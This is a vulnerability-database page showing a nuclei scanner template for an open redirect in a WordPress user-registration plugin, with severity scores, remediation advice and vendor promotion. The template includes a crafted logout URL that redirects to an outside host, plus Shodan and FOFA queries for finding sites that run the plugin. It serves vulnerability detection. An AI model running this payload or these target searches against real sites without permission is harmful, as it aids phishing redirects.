Lucene search
K

User Registration & Membership WordPress plugin - Open Redirect

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Open redirect in User Registration and Membership plugin via redirect_to_on_logout.

Related
Refs
Code
id: CVE-2026-6203

info:
  name: User Registration & Membership WordPress plugin - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    User Registration & Membership WordPress plugin <= 5.1.4 contains an open redirect caused by insufficient validation of 'redirect_to_on_logout' parameter, letting attackers redirect users to malicious external URLs after logout, exploit requires crafted URL.
  impact: |
    Attackers can redirect users to malicious sites after logout, facilitating phishing attacks and user deception.
  remediation: |
    Update to a version later than 5.1.4 or the latest available version.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-user-registration-membership-plugin-5-1-4-unauthenticated-open-redirect-via-redirect-to-on-logout-parameter-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6203
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-6203
    epss-score: 0.00663
    epss-percentile: 0.47222
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/user-registration/"
    fofa-query: body="/wp-content/plugins/user-registration/" && title="WordPress"
  tags: cve,cve2026,wp,wordpress,wp-plugin,user-registration,open-redirect

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/user-registration/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "User Registration")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/?user-logout=true&redirect_to_on_logout=https://interact.sh"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: word
        part: header
        words:
          - "Location: https://interact.sh"
# digest: 4a0a00473045022038b679b2e1fa4eb9a23be93105fd38ebc8b44cef07674d1f439c1215e9b60b63022100a75a624d62877347854e4653faa290f9820144f60b8cb26196d0299a9c4cb229:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2026 06:22Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.1
EPSS0.00663
SSVC
9